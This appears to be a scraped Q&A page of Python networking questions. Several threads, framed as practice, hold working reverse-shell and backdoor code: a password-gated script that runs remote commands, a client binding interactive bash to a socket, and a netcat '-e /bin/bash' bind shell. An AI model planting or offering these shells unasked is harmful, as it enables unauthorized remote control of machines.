Backdoor Shell doesn't allow me to change Directory - python

Below you can see a Python Script which establishes a connection to my machine on port 1234. Using Netcat I can listen on that port and then perform actions on my machine using the terminal (I know that this is trivial, but its just for practicing).
Now the problem is that the commands like "ls, mkdir, pwd, rm or even "ls /root/Desktop/" are working, but however "cd /root/Desktop" or "cd .." are not working, which is actually really bad. Typing in "cd .." is not returning any error message, but its also not changing the directory. I can not leave my python directory.
Here is the script:
#! /usr/bin/python
import socket
import subprocess
host = "localhost"
port = 1234
passwd = "hacking"
def login():
global s
s.send("Login: ")
pwd = s.recv(1024)
if pwd.strip() != passwd:
login()
else:
s.send("Connected #> ")
shell()
def shell():
while True:
data = s.recv(1024)
if data.strip() == ":kill":
break
proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, stdin=subprocess.PIPE)
output = proc.stdout.read() + proc.stderr.read()
s.send(output)
s.send("#> ")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
login()
I got it from here .
Can anyone help me out? Any idea why I cannot leave the directory? Thanks in advance!

It actually works fine. what if you tried this in a single command: cd /other/directory; ls. You'll see that the directory did in fact "change" for the duration of that command. Every new command will gets a fresh environment (so back to the same original directory). If you really want to change the "server context" in between commands then you need to do that in python. Below is a dirty example added onto the code you provided:
#! /usr/bin/python
import socket
import subprocess
import os
host = "localhost"
port = 12345
passwd = "hacking"
def login():
global s
s.send("Login: ")
pwd = s.recv(1024)
if pwd.strip() != passwd:
login()
else:
s.send("Connected #> ")
shell()
def shell():
while True:
data = s.recv(1024).strip()
if data == ":kill":
break
try:
cmd, params = data.split(" ", 1)
if cmd == ":chdir":
os.chdir(params)
print "chdir to %s" % (params)
s.send("#> ")
continue
except:
pass
proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, stdin=subprocess.PIPE)
output = proc.stdout.read() + proc.stderr.read()
s.send(output)
s.send("#> ")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
login()
Same idea as your ":kill" command, if the script see's a ":chdir /new/directory" then python executes the chdir function, otherwise pass it on to Popen.

Related

Python netcat not returning command shell

The code below is meant to copy the features of netcat for instances where netcat is removed from a server but python is not. However, no matter what I try I can't seem to figure out the following problem:
I run the following
./Netcat.py -l -p 9999 -c
followed by
./Netcat.py -t localhost -p 9999
in a separate terminal. I can confirm that, when acting as a server the script does, indeed, receive a connection from the second instance of the script and that it receives data when it is set (upon pressing CTRL+D). However, I then get a hung terminal which does not receive a command prompt back, nor does it have the ability to send more data. I am hoping someone can point out the error at this point.
What should happen is as follows:
spin up server insatance
run script as a client
type some data and close STDIN with CTRL+D at which point the client sends the data to the server
The server should then receive the data and send back a command prompt to the client
The problem is at step 4 and I'm pulling my hair out at this point.
Edit
Having run strace I determined that the client program gets hung up waiting to receive data which I have noted the corresponding line in the code. I do not see why this would be the case.
import sys # used for accessing command line args
import socket # creation of socket objects to listen & send/receive data
import getopt # helps scripts to parse the command line arguments in sys.argv
import concurrent.futures # for running commands in a subshell
import subprocess # The subprocess module allows you to spawn new processes, connect to their input/output/error pipes, and obtain their return codes.
## Globals ##
listen = False
command = False
target = ""
port = 0
## END GLOBALS ##
def client_sender(buffer):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
client.connect((target, port))
if len(buffer):
# bytes([source[, encoding[, errors]]])
client.send(bytes(buffer, 'utf-8'))
# continue sending and receiving data until user kills script
while True:
recv_len = 1
response = ''
while recv_len:
data = client.recv(4096) #<-- PROBLEM
recv_len = len(data)
response += data.decode('utf-8')
if recv_len < 4096:
break
print(response)
buffer = input('#: ')
buffer += '\n'
client.send(buffer)
except socket.error as e:
print('[*] Exception! Exiting')
print(e)
client.close()
def server_loop():
global target
global port
# if no target is defined, listen on all interfaces
if not len(target):
target = '0.0.0.0'
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((target, port))
server.listen(5)
print(f'listening on {target}:{port}')
while True:
client_socket, addr = server.accept()
with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
executor.submit(client_handler, client_socket)
def run_command(command):
command = command.rstrip()
# run command & retrieve output
try:
output = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True)
except:
return 'Failed to execute command.\r\n'
def client_handler(client_socket):
global command
# check if shell requested
if command:
while True:
client_socket.send('<BHP:#> ')
# receive until linefeed
cmd_buffer = ''
while '\n' not in cmd_buffer:
cmd_buffer += client_socket.recv(1024)
response = run_command(bufffer)
client_socket.send(response)
def main():
global listen
global port
global command
global target
# make sure the user provided options & arguments
if not len(sys.argv[1:]):
usage()
# parse commandline options
try:
opts, args = getopt.getopt(sys.argv[1:],"lt:p:c", #: succeeds options which expect an argument
['listen', 'target', 'port', 'command'])
except getopt.GetoptError as err:
print(str(err))
usage()
# handle commandline options
for option, argument in opts:
elif option in ('-l', '--listen'):
listen = True
elif option in ('-e', '--execute'):
execute = argument
elif option in ('-c', '--commandshell'):
command = True
elif option in ('-t', '--target'):
target = argument
elif option in ('-p', '--port'):
port = int(argument)
# not listening; sending data from stdin
if not listen and len(target) and port > 0:
buffer = sys.stdin.read()
client_sender(buffer)
if listen:
server_loop()
if __name__ == '__main__':
main()

Python true interactive remote reverse shell

I'm trying to create a true interactive remote shell using Python. When I say true, I mean I don't want to just execute a single command and send the results- I have that working already. I also don't want to abstract executing single commands by having the server interpret directory changes or what not.
I am trying to have a client start an interactive /bin/bash and have the server send commands which are then executed by the same persistent shell. For instance, so if I run cd /foo/bar then pwd would return /foo/bar because I would be interacting with the same bash shell.
Here's some slimmed down example code that currently only will do single command execution...
# client.py
import socket
import subprocess
s = socket.socket()
s.connect(('localhost', 1337))
while True:
cmd = s.recv(1024)
# single command execution currently (not interactive shell)
results = subprocess.Popen(cmd, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
results = results.stdout.read() + results.stderr.read()
s.sendall(results)
# server.py
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 1337))
s.listen(5)
conn, _ = s.accept()
while True:
cmd = raw_input('> ').rstrip()
conn.send(cmd)
results = conn.recv(4096)
print results
I've tried many solutions none of which have worked. The subprocess module had a communication method, but it kills the shell after a single command. I'd really like to be able to accomplish this with stdlib, but I've looked at the pexpect module after reading this thread. However, I can't get that to work either? It also doesn't look like it's primary use case is for creating an interactive shell, but rather catching specific command line output for interaction. I can't even get single command execution working with pexpect...
import pexpect, sys
proc = pexpect.spawn('/bin/bash')
proc.logfile = sys.stdout
proc.expect('$ ')
proc.sendline('pwd\n')
If anyone can help it would be appreciated, I feel like there could be a way to multi-thread and spawn off a /bin/bash -i with subprocess and then some how write to stdin and read from stdout? Thanks in advance, and sorry for the length.
Try this code:
# client.py
import socket
import subprocess
s = socket.socket()
s.connect(('localhost', 1337))
process = subprocess.Popen(['/bin/bash', '-i'],
stdout=s.makefile('wb'), stderr=subprocess.STDOUT,
stdin=s.makefile('rb'))
process.wait()
# server.py
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 1337))
s.listen(5)
conn, _ = s.accept()
fp = conn.makefile('wb')
proc1 = subprocess.Popen('cat', stdin=conn.makefile('rb'))
while True:
fp.write(sys.stdin.read(4096))
proc1.wait()

socket can't communicate with netcat bash

On a vm I used the command: nc -l -p 8221 -e /bin/bash and made a python3 script:
def netcat():
print ("starting connection")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.60", 8221))
while True:
user = input("what to send?: ")
s.sendall(bytes(user, "utf-8"))
time.sleep(5)
word = "bob"
data = s.recv(4096)
if data == b"":
pass
else:
data = data.decode("utf-8")
print ("Received:", repr(data))
print ("Connection closed.")
s.shutdown(socket.SHUT_WR)
s.close()
netcat()
this script doesn't work. By don't work I mean when I run a command with my python script, lets say "pwd", it just loads but never runs.
When, instead of running the python script I would run nc 192.168.1.60 8221, it would work fine. Any ideas why?
From input()'s documentation:
The function then reads a line from input, converts it to a string
(stripping a trailing newline), and returns that.
But Bash is operating in canonical mode and won't process input till a new line arrives. This won't happen, leading to recv blocking forever.
add a + '\n' after the user = input("what to send?: ") to fix it.

Python: Execute a command in Cisco Router on successful ping else print error

The following code fetches IP address (Cisco Router) from a text file and executes the mentioned command and prints the resultant output on to a file. Here am trying to first test the reach-ability of the device by using PING, on successful ping response commands should be executed else should print an error and move to the next host. Please help me on how to achieve this. I am a newbie.
Here is my code,
import paramiko
import sys
import os
import subprocess
with open('C:\Python27\Testing\Fetch.txt') as f:
for line in f:
line = line.strip()
dssh = paramiko.SSHClient()
dssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
dssh.connect(line, username='cisco', password='cisco')
stdin, stdout, stderr = dssh.exec_command('sh ip ssh')
mystring = stdout.read()
print mystring
f = open('C:\Python27\Testing\output.txt', 'a+')
f.write(mystring)
f.close()
dssh.close()
Input file Fetch.txt looks like this,
10.0.0.1
10.0.0.2
10.0.0.3
10.0.0.4
10.0.0.5
I scoured through the forum and achieved just about what I am looking for.. If all the IP addresses are reachable in that list, the script works just fine. But if any one of the IP address is unreachable then the script ends abruptly without proceeding to the next IP address. I realize that am doing something wrong here, I just need that little bit of help to get this working..... Please help out.
import paramiko
import sys
import os
import subprocess
dssh = paramiko.SSHClient()
dssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
with open('C:\Python27\Testing\Fetch.txt') as f:
for line in f:
line = line.strip()
with open(os.devnull, "wb") as limbo:
ip = line
result = subprocess.Popen(["ping", "-n", "1", "-w", "200", ip],
stdout=limbo, stderr=limbo).wait()
if result:
print ip, "Down"
else:
print ip, "Reachable"
dssh.connect(line, username='cisco', password='cisco')
stdin, stdout, stderr = dssh.exec_command('sh ip ssh')
mystring = stdout.read()
print mystring
f = open('C:\Python27\Testing\output.txt', 'a+')
f.write('\n' + ip + '\n' + mystring)
f.close()
dssh.close()
You ideally don't have to test if a host is pingable first using a separate if statement..paramiko comes inbuilt with a lot of exception checking ..using this along the socket module..your program can be written in a cleaner fashion without having to use subprocesses..
import paramiko
import socket
dssh = paramiko.SSHClient()
dssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ips = [i.strip() for i in open("C:\Python27\Testing\Fetch.txt")] # creates a list from input file
for ip in ips:
try:
dssh.connect(ip, username='cisco', password='cisco', timeout=4)
stdin, stdout, stderr = ssh.exec_command('sh ip ssh')
print ip + '===' + stdout.read()
ssh.close()
except paramiko.AuthenticationException:
print ip + '=== Bad credentials'
except paramiko.SSHException:
print ip + '=== Issues with ssh service'
except socket.error:
print ip + '=== Device unreachable'
this will catch other exceptions like bad credentials and other issues with ssh service
You could try using fabric which is made for executing SSH commands on multiple machines.
This is just a snippet i threw together but it should show you the way to go.
from fabric.api import run, execute ,env
class Fetcher:
def __init__(self,hosts=[]):
env.hosts= hosts
env.warn_only = True # needed to not abort on pingtimout or other errs
def getclock(self)
run('sh clock')
def fetch(self):
results = execute(self.getclock,hosts=env.hosts)
if __name__ == '__main__':
hosts = loadfromtxt(hosts.txt)
f = Fetcher(hosts=hosts)
f.fetch()
I recall an example of python threading, either in the docs or in a book I read (don't remember the source) that does something like what you're trying to do. Something like this should work:
import sys
import os
import subprocess
from threading import Thread
class Pinger(Thread):
def __init__ (self, ip):
Thread.__init__(self)
self.ip = ip
self.status = False
def __repr__(self):
return "Pinger for '%s' status '%s'" % (self.ip, self.status)
def run(self):
with open(os.devnull, "wb") as limbo:
# Changed the arguments because I don't have a windows ping.exe to test it on
result = subprocess.Popen(["ping", "-c", "2", "-q", self.ip],
stdout=limbo, stderr=limbo).wait()
if result:
# print self.ip, "Down"
self.status = False
else:
# print self.ip, "Reachable"
self.status = True
hosts = []
with open('Fetch.txt') as f:
for line in f:
host = Pinger(line.rstrip())
# print host
hosts.append(host)
host.start()
for host in hosts:
host.join()
if host.status:
print "Host '%s' is up" % host.ip
#### Insert your ssh exec code here ####
# dssh.connect(host.ip, username='cisco', password='cisco')
# etc.
else:
print "Host '%s' is down" % host.ip
Why do you need Paramiko module or to create an input if python can do itself ?
#!/usr/bin/python
import os
hostname = raw_input('Enter the Router Name: ')
routers = hostname.split(',')
print routers
for hostname in routers:
response = os.system("ping -c5 " + hostname)
if response == 0:
print(hostname, 'is up!')
else:
print(hostname, 'is down!')

Send output from a python server back to client

I now have a small java script server working correctly, called by:
<?php
$handle = fsockopen("udp://78.129.148.16",12345);
fwrite($handle,"vzctlrestart110");
fclose($handle);
?>
On a remote server the following python server is running and executing the comand's
#!/usr/bin/python
import os
import socket
print " Loading Bindings..."
settings = {}
line = 0
for each in open('/root/actions.txt', 'r'):
line = line + 1
each = each.rstrip()
if each != "":
if each[0] != '#':
a = each.partition(':')
if a[2]:
settings[a[0]] = a[2]
else:
print " Err # line",line,":",each
print " Starting Server...",
port = 12345
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(("", port))
print "OK."
print " Listening on port:", port
while True:
datagram = s.recv(1024)
if not datagram:
break
print "Rx Cmd:", datagram
if settings.has_key(datagram):
print "Launch:", settings[datagram]
os.system(settings[datagram]+" &")
s.close()
Is it possible to easily send the output of the command back, when the server is started and is running a command the output is shown in the ssh window, however I want this output to be sent back to the browser of the original client, maybe setting the browser to wait for 15 seconds and then check for any data received via the socket.
I know I am asking quite a lot, however I am creating a PHP script which I have a large knowledge about, however my python knowledge lacks greatly.
Thanks,
Ashley
Yes, you can read the output of the command. For this I would recommend the Python subprocess module. Then you can just s.write() it back.
Naturally this has some implications, you would probably have to let your PHP script run for a while longer since the process may be running slow.
# The pipe behaves like a file object in Python.
process = Popen(cmd, shell=True, stdout=PIPE)
process_output = ""
while process.poll():
process_output += process.stdout.read(256)
s.write(process_output)
# Better yet.
process = Popen(cmd, shell=true, stdout=PIPE)
stdout, stderr = process.communicate() # will read and wait for process to end.
s.write(stdout)
Integrated into your code:
# ... snip ...
import subprocess
con, addr = s.accept()
while True:
datagram = con.recv(1024)
if not datagram:
break
print "Rx Cmd:", datagram
if settings.has_key(datagram):
print "Launch:", settings[datagram]
process = subprocess.Popen(settings[datagram]+" &", shell=True, stdout=subprocess.PIPE)
stdout, stderr = process.communicate()
con.send(stdout)
con.close()
s.close()
Here's an example of how to get the output of a command:
>>> import commands
>>> s = commands.getoutput("ls *")
>>> s
'client.py'

Categories